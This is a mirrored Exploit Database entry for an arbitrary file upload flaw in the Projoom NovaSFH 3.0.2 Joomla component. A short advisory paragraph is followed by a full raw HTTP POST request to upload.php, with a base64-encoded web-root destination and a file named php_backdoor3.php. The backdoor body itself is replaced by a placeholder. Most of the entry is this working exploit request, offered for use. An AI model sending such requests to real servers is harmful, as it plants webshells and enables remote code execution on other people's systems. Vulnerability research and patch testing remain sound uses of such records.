Joomla! Component Projoom NovaSFH 3.0.2 – ‘upload.php’ Arbitrary File Upload

• Exploit Database
• 37 阅读

• 作者： Yuri Kramarz
  日期： 2013-12-13
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/39088/

• source: https://www.securityfocus.com/bid/65438/info
  
  Projoom NovaSFH plugin for Joomla! is prone to an arbitrary-file-upload vulnerability because it fails to adequately sanitize user-supplied input.
  
  An attacker may leverage this issue to upload arbitrary files; this can result in arbitrary code execution within the context of the vulnerable application.
  
  Projoom NovaSFH Plugin 3.0.2 is vulnerable; other versions may also be affected. 
  
  POST /administrator/components/com_novasfh/views/upload.php?action=upload&dest=L3Zhci93d3cvaHRtbA== HTTP/1.1
  Host: <IP>
  Proxy-Connection: keep-alive
  Content-Length: 513
  Origin: <originl>
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36
  Content-Type: multipart/form-data; boundary=----------ae0cH2Ij5ei4ei4Ef1Ij5Ij5ae0cH2
  Accept: */*
  DNT: 1
  Referer: http://<host>/administrator/index.php?option=com_novasfh&c=uploader
  Accept-Encoding: gzip,deflate,sdch
  Accept-Language: en-US,en;q=0.8
  
  ------------ae0cH2Ij5ei4ei4Ef1Ij5Ij5ae0cH2
  Content-Disposition: form-data; name="Filename" 
  
  php_backdoor.php
  ------------ae0cH2Ij5ei4ei4Ef1Ij5Ij5ae0cH2
  Content-Disposition: form-data; name="Filedata"; filename="php_backdoor3.php" 
  Content-Type: application/octet-stream
  
  [PHP_CODE]
  
  ------------ae0cH2Ij5ei4ei4Ef1Ij5Ij5ae0cH2
  Content-Disposition: form-data; name="Upload" 
  
  Submit Query
  ------------ae0cH2Ij5ei4ei4Ef1Ij5Ij5ae0cH2--